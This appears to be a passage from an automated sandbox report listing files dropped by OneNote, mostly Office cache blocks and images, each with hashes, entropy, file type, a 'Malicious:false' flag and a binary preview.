                                                                                                                                                                                                              SHA1:EE1EA0FBB6D9FA7A20EA5C5A34836DD41AE454EB
                                                                                                                                                                                                              SHA-256:5112C5DB625EC6F2DDD3EE3EEDF16F8A8205663DD7058762F5D8ED236B8F54A9
                                                                                                                                                                                                              SHA-512:E10377B38E1C42F3BEE75B654F549303DA78BA030FF679F0E8BC1770CB0CC2B51B20ADBB523F2DEB6EAAB98B9B213A1FD8BA8AB09E44589E17FC258A34BE3B81
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....................................................................................................................................................................................................^K......^K..W.A.T.9,2ao.>.......>....O..Y.8.z4.^K..W.A.T.9,2ao.^K..>....O..Y.8.z4.>................................>.......>...................................................>...$...>.\.....>.N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s...........................^K..c..,....................>... ..$................>... ..$p...........7..._4O..)...........wl&.&D..z........N...^............................................................................................................wl&.&D..z........................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5292000863921095
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzciklKaclqtyLx8Olu3Lt5dLYw1E9QLk:jRcVAaclqtV3Zv0QE9QI
                                                                                                                                                                                                              MD5:0CE4E887B5DE7B6BD8BF1E7DA55ABF29
                                                                                                                                                                                                              SHA1:9C3741038264A6941D94610D86D4E2F8956668D0
                                                                                                                                                                                                              SHA-256:07A35A6DCCE34A3AC27B1AAEAD445E5E92281C2040D43FAA6CCAB275F4E24E4E
                                                                                                                                                                                                              SHA-512:748A86977C40C373EBBA5B1C62C4C08B08390C1AC794B0AE8EFF043BE0E7F92CB913478DEB255947B36E284C791D8F26B3E961F8750555A2082AC7A16B657308
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................ej......ej.cn~oK..]*B..N........................ej.cn~oK..]*B..Nej...................................................ej......ej..................................................ej......ej.\..............................................................4..1...(...(.......1.0.3.3.................p........ZW...kA..b0.].v...........@.5...H....i+....N...^............................................................................................................@.5...H....i+....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6075400206860104
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:90CLQhMjOVghMjJFElsRLx88cbrMkq2Sz1sgtBXYiljqw1EIiljS:eCRiVnkNYq+FYGjqQEIGjS
                                                                                                                                                                                                              MD5:B6F820E43955FAB90030F33AFCBA42A8
                                                                                                                                                                                                              SHA1:81CDF7EAE9B8510F71C07659FE7F52AD53EE94D0
                                                                                                                                                                                                              SHA-256:2BCA5C6B946B99A1DBF0B1FAD2BF92590459826D9E91B7CFCC7A7C97BA297517
                                                                                                                                                                                                              SHA-512:A89086B2395931DC8D5D036DA1CE8EBBFC06BF41E39C80556CE96912DC08FEA9FE47CD484B7E7D8C6CE6753B41ECBD6A34F4D5E23BCCE9126E48DAFF1CCE4B13
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................w.......w..o.A....u.y:..........................w..o.A....u.y:..w....................................................w.......w...................................................w.."....w\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p...........o.E.8..u.s...........X*H..H.H..4.........N...^...........................................................................................................X*H..H.H..4.........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.8099194123700107
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:EEWrqQE1nuaFtKWcFDvsD4Odn1mFdUcQE41:4qfnvPcxnmgsc
                                                                                                                                                                                                              MD5:A9D1F36B03CEB598F9FD2717E4B978CB
                                                                                                                                                                                                              SHA1:6C394F26AE6CCFF169105CBC9A284C331D651CAA
                                                                                                                                                                                                              SHA-256:DE355904AF21580A4FABD9F3876E59674B26CF1727D480DA72AC0D237A2D48ED
                                                                                                                                                                                                              SHA-512:EF079766DAA5FC433079958BF1A7B32DA283B9EBEDF0F39FF6B6A186D97A72598AE75830FD9BBB1A10142ABE1DF4B281A86788D7EBB14DE3C718EC15F2171A04
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................9.......9u|%.F.....h.<.b.....<.b...QL.0....>...9u|%.F.....h...9.<.b...QL.0....>.<.b................................9.......9...................................................9..%....9\......9N."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........................<.b..c..,.....................9.. ..$.................9.. ..$p..............o.z5E../.............|....L....u|y....N...^.............................................................................................................|....L....u|y............................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5232634088927651
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzcoIPut2HiPqxcifbyLx8Olu3BYNYj4k6cw1EEwK:jRcpiLqxfV3BggZQElK
                                                                                                                                                                                                              MD5:0EED3015A7FE059978F658B62A638BB8
                                                                                                                                                                                                              SHA1:9A52ABCE242C9C00BA778B3A78C3A31D6617D9EA
                                                                                                                                                                                                              SHA-256:112186DDBFC0D1671CC9E34F611731F3496C6B151D0892A1B3AD2E9BB220ADD6
                                                                                                                                                                                                              SHA-512:52739086FAC9FD15CD1509FFD3660E8F7B7EDBE9AB11963F1D8F7A421A74E6FD1F9CFC30D7A0E72C9C527F913ED9EECFC397D5DEB207935C8A313174B5CBAD3B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>..............................................................................................................................................................................................................Z.UiC.6..P..s...........................Z.UiC.6..P..s............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.................p........t..n(.B.uE..n............. ....5L..C=T.a.....N...^............................................................................................................ ....5L..C=T.a.....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.4700439888202774
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:VyCipocUX70IRtXkpHhPxj410Jr++r/vHBfHe++Wh/SOeGvY2+IDRcQE+Qy:NTUpHhPlDzbhPmWjeG7tKSQ
                                                                                                                                                                                                              MD5:4854C7AC5B95B8BDAA040B55E4C2D01B
                                                                                                                                                                                                              SHA1:23E18EFFCB211EB22A30A79DD4361EA89DBCDBF2
                                                                                                                                                                                                              SHA-256:3D99BE9D0E0789798951FA606C4AC277F0E283E0C8470EC235C74F76901EE304
                                                                                                                                                                                                              SHA-512:F7A973472E37BA891A26C646C136E7B7DBC1C0A1D385D271B8E614A6B30017FBA7D583E6CA0107964B2297557AD1DCCDECB729D7C83E82827C7F242BF058902E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........".........................?.......................................................................................................................................................................H.......HI}..I....r..(.......(..yF.K......d..t...E..._..cId....Z.0..H..\G..O_.Z..(..yF.K......(............?.......?...................................................?....?..?..\....?..N....?..N.)..?..N.7..?..N.;............................4..1...(...(.......U.s.e.r.....................Z...c..,...................?.... ..$..........?.......?..G.p.I...xO.U..Z.......Z.0..H..\G..O.2...............................(...?....................................(....c..,...................?...?.... ..$......d.......d..t...E..._..cI.Z.......Z.0..H..\G..O_..HI}..I....r....H.?..G.p.I...xO.U.?...(..yF.K......(.......>................Z.0..H..\G..O_.........................................d....c..,...................?...?...?.... ..$.....................H..c..,...................?...?...?..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.755251361640143
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:bEAE7+frcgFll7YXWbSS1mkQ3siQEdsa:RfKmbSjkQciO
                                                                                                                                                                                                              MD5:8F6C69865F8ED62158F2923FDAD0CDA9
                                                                                                                                                                                                              SHA1:7901284670C2D94B606D79435FDB7956992698E4
                                                                                                                                                                                                              SHA-256:127D1E2B8598846760AE53F3F77BF2226618A3B68FEB0E0BDF769441FE554885
                                                                                                                                                                                                              SHA-512:157645141FBF3F3147A11A2D38386AA239BB35D4E528B54ECCC14D87B93B90C35120B2E81C94C86E241BD9FE5273AEFB0F6EAD8C9F9AB325DB2186A951AEEE1F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................h.......h...&..C.{.7...[...............L...7.F..h...&..C.{.7...[h..........L...7.F...................................h.......h...................................................h....#..h..\....h..N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........................c..,...................h.... ..$...............h.... ..$p...........SI..f..D..$.r.........^.....E.......^....N...^...........................................................................................................^.....E.......^............................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5262057840223608
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzcs4RE7C+h7Bt10yIlIkyLx8Olu3gl6Oiw1EgOa:jRcscE7Cq7BtiTlVV3goVQEg9
                                                                                                                                                                                                              MD5:4E2640CF200D7F540E5445D3E2B431AC
                                                                                                                                                                                                              SHA1:75A637B88180B6DC042293353FE5C964EB8B1A53
                                                                                                                                                                                                              SHA-256:1829FE984199181652D879E52DF48934F935C5CF587E1404766C2CD8D5D00388
                                                                                                                                                                                                              SHA-512:A2C9FFDA7E73A252E378110423EAC035CC81EE22C7F6F156E3AAB06B10B107D3FF9BB11CDC478D97D29F4D705AB346CD3B12A605A1CEB83786742B8A369D97DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................b.......b....`ED.M....#........................b....`ED.M....#b....................................................b.......b...................................................b.......b..\..............................................................4..1...(...(.......1.0.3.3.................p.........xN...D..O.(.............E.r...G......Z....N...^............................................................................................................E.r...G......Z....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7679297143758639
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:D0CUREX01ZcP30cP30EXvLduseIW+01Uk1in/Ic6GPNrQEnNn:Q5v3FYp7S1U9/ILa
                                                                                                                                                                                                              MD5:195427F6CEB5E1D1214DE5A9FD5408C3
                                                                                                                                                                                                              SHA1:BB8D51A1DB0869D9630851312E0877904F355182
                                                                                                                                                                                                              SHA-256:65BFCC041FEA7EBD9E39BB3884EDEB3273D274F1C30EA79B891ECCD4B3B80666
                                                                                                                                                                                                              SHA-512:C4D3D52C1B6819A6BA9134AD03AF4294D30302E15031F6A167D5FEA2462A243A27340248F073A8F1440FA1AEBBF8E1C07E884672A67FECEB2CF8750C343F97E8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................#w0.....#w0.B.\H.rc-.x..d?2.....d?2.>..G.....".pd?2.>..G.....".pd?2.#w0.B.\H.rc-.x..#w0..............................#w0.....#w0.................................................#w0..$..#w0\....#w0N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........................d?2..c..,...................#w0.. ..$...............#w0.. ..$p...........=.sX.E.&3.U.F.......{..>iL...o<r.....N...^...........................................................................................................{..>iL...o<r.....................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.5254148740943798
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzcq4lt4724lgBjyLx8Olu3gBkGZcw1EXXK:jRcq4li24lgdV3gBsQEHK
                                                                                                                                                                                                              MD5:F1F5D1E2EFDE6BFDDB1F0B34CECE5F96
                                                                                                                                                                                                              SHA1:5D1239F9ECA87EADD308DEA58E83E88EBC430A8B
                                                                                                                                                                                                              SHA-256:4185B3437D7736DF726E0668073976FEA6D170E9D5E41FA7C33DE91DCD483776
                                                                                                                                                                                                              SHA-512:B4328E8C5AF121536639ED902545C88507B578CB8FD4C5533E0598B765D2407BCE21AB20CA1BE3DF3099D1A54C9F18DDEE3AAE3A8DC2B4ADDC6A16F5E6CBBA87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>....................................................................................................................................................................................................x.......x.`$VLB......4@.........................x.`$VLB......4@.x....................................................x.......x...................................................x.......x.\..............................................................4..1...(...(.......1.0.3.3.................p.........,.h..D...../..........yv&..hRL.=..4.,.....N...^...........................................................................................................yv&..hRL.=..4.,.....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.6132391188893209
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:90CQHDHHN/Fn4vnBsLx88cbrMkq2Sz1salwy5G0kbcw1Eh5G0k1K:eCMnKBqnkNYqunYZcQEhYa
                                                                                                                                                                                                              MD5:654A25D65D623C7CD766620F0627E5ED
                                                                                                                                                                                                              SHA1:615388678BCD0101636D05A2F41F31E5204A063E
                                                                                                                                                                                                              SHA-256:3DED350B1AA787E77D713B4EE6A56D6B0678E52B3F6C16312F99BB990DFABD02
                                                                                                                                                                                                              SHA-512:FBDF2D0E7EBFA0561400B6A8FAEEB06923D621E7A6B8E0D2650C01B87601036FCB6586F6BE2966AA113BF605E237B675162EB5109CB7A86FEE2CE79F012964C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................G.......G..0A..J.j1..Rt.........................G..0A..J.j1..Rt.G....................................................G.......G...................................................G...."..G..\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.......gR...``A..;.X..-............'\.}kA.c..#.......N...^.............................................................................................................'\.}kA.c..#.......................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.8060745378676049
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:EEm2MjNujMfBvy0CwvsD4GdYA147lJC2MqmQEfC2Mn:fZwAOnGdYjhJC26DC2
                                                                                                                                                                                                              MD5:8879BE36CAAAEBBA2D80C2151A1CE813
                                                                                                                                                                                                              SHA1:A26FDB112CB7DD97DBB269FB0671F6E26C83E348
                                                                                                                                                                                                              SHA-256:0BFB27719667A77D2D40ACB7844E6E97616C742B3AAF1B9EA39E0FBBFA3FE62C
                                                                                                                                                                                                              SHA-512:D0D3097195744744D6CE5B29F8E29F9B8B963ADEE47E5BADCE4E48A084799D071A1A83EBD79C09A598632836E642643DD088822F6296F77FA4AA424FD4EE9232
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...................................................................................................................................................................................................7$G.....7$G.m$J.E..yi.n.&p......&pb.OqM.FI.)...7$G.m$J.E..yi.n7$G..&pb.OqM.FI.)...&p..............................7$G.....7$G.................................................7$G..%..7$G\....7$GN."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...........................&p..c..,...................7$G.. ..$...............7$G.. ..$p...........HJ..a:B...U..........jf..!.F.Z....[.....N...^............................................................................................................jf..!.F.Z....[.............................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.522849190769955
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:jhzcwlv6ivI0OvOVml/yLx8Olu32/8ezrw1E1Yzn:jRcwlv6iSvOMtV32/8GrQEen
                                                                                                                                                                                                              MD5:85C5EB0859A73D74B305792B9BEF30AB
                                                                                                                                                                                                              SHA1:5A6167F5CAD8DCFC9DC72061352AB377F3A85A57
                                                                                                                                                                                                              SHA-256:15E4682B5F9E164C21E2D8A45CFC99194CC3C2B0DD86E0B03143EDF2BDFFC4F5
                                                                                                                                                                                                              SHA-512:26D7543E773C50745332CFC96643643F638CC458D5799181FD5F73EC89017EF9D6B3F6D9B0BD4BA48629AACDEDFAE32A136BD5B2A38D3516BB16D82EED33AB8D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.....................................................................................................................................................................................................r.......r...GE....8.............................r...GE....8.....r....................................................r.......r...................................................r.......r\..............................................................4..1...(...(.......1.0.3.3.................p..........I..D.(...2u..........I.(G..CB.u...M.....N...^...........................................................................................................I.(G..CB.u...M.....................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.47516879638469
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:os8wufAo81tgIWqEbz/epXmL+Aep9sGDj4h7brdMrnEY9GdX6mkyykyl:osoAX1/E/IXmyAI9siMPRMvs4R
                                                                                                                                                                                                              MD5:044867F713B5B3D0F033512C5088368C
                                                                                                                                                                                                              SHA1:596F0D34C0FEF9D4B96F060BA9A4F25E8BCAB400
                                                                                                                                                                                                              SHA-256:6A84FE66F47D1EED0C5962D865FA928D169BDAF428F719A55424EC568E7D890C
                                                                                                                                                                                                              SHA-512:F70EA8F553B7771999DDA00D70D56E43857764B42D13FA29DB6DE1F3D787B27817CFA03A138F0300DB34CB4EADE0F31987ADA3594DB1EFF12D67336477E6D614
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ,.Y.....,.Y.........H.,.Y.........H.,.Y..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............R.<.@.-.,..l.....N...^...............*...[..@..6...K.........f........................................I.qk..B.....LZ..............R.<.@.-.,..l...........R.<.@.-.,..l..........,.Y.....,.Y.....,.Y.........................................,.Yj....,.YT.]..,.Y.....,.Y..B..,.YH....,.Y..B..,.Y..>.),.Y..J...................;........4...4...4.."..............,.Y.,.Y.,.Y..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4.........,.Y.....,.Y....#,.Y............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59832
                                                                                                                                                                                                              Entropy (8bit):7.308211468398169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                              MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                              SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                              SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                              SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.357668630062996
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:bsCiY4xpIDYTlZnDZHftUEQ2MXV9lC7Bj4NrdMrm30dXB38ApAU68snDog:bsCEp5XDZ/WEKXV9mBgRMrHpAF86Do
                                                                                                                                                                                                              MD5:D39B2F1F94577719F38D569B3D814FDA
                                                                                                                                                                                                              SHA1:AB5528A9B4C7BDE742E16C154669F5695B601AFF
                                                                                                                                                                                                              SHA-256:2B1069497CDE5161ED4D9C0A401DD1FCB7C6FD07A89F4D2A7765E436170C462E
                                                                                                                                                                                                              SHA-512:2560E388E61F5368987E7969A541F557338AD7164B50A505A1CB317C6CC2BD2DC579391BBF00FE10D9A41266D670D5C4A92193A6718FCD7A4F1F0E02DEA8C35E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ.sL......sL...........F..sL...........F..sL..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............z@,....%Kns...V....N...^.................^..JF.@&/...v........H........................................I.qk..B.....LZ.............z@,....%Kns...V.........z@,....%Kns...V..........sL......sL......sL..........................................sLj.....sLT.^...sL......sL..B...sL..C...sL..>...sL..|...sL .3...................;........4...4...4.."...............sL..sL..sL..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........sL......sL....#.sL............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33032
                                                                                                                                                                                                              Entropy (8bit):2.941351060644542
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                                                                                                                              MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                                                                                                                              SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                                                                                                                              SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                                                                                                                              SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12180
                                                                                                                                                                                                              Entropy (8bit):5.318266117301791
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                                                                                                                              MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                                                                                                                              SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                                                                                                                              SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                                                                                                                              SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.361216375304524
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:NCsW8bjMDdtkNHPEPEczowLVGcXDc9Ms7p5VrdMriuQX15k9qHm6q/F:NCs3jMDdyVPEsAowxXA9M+lRMteh6/
                                                                                                                                                                                                              MD5:294ED9C9909F38F678018C08AA65EC37
                                                                                                                                                                                                              SHA1:CE1D6C3BA0F7B7FA7D2CB1069A4C41373ACCB51A
                                                                                                                                                                                                              SHA-256:86B02693229F2C63961C9917EFFCB1CCB9C264C590F813CFAEE7D338EABE5760
                                                                                                                                                                                                              SHA-512:FA4C2805C6A12422701924879CBD5E50412F5F0F1D01F586AA4F13FF2A0883A77CF52EFA31BA572FA637B39346E93D631B934E5743FED8519D8669FD0740E150
                                                                                                                                                                                                              Malicious:false
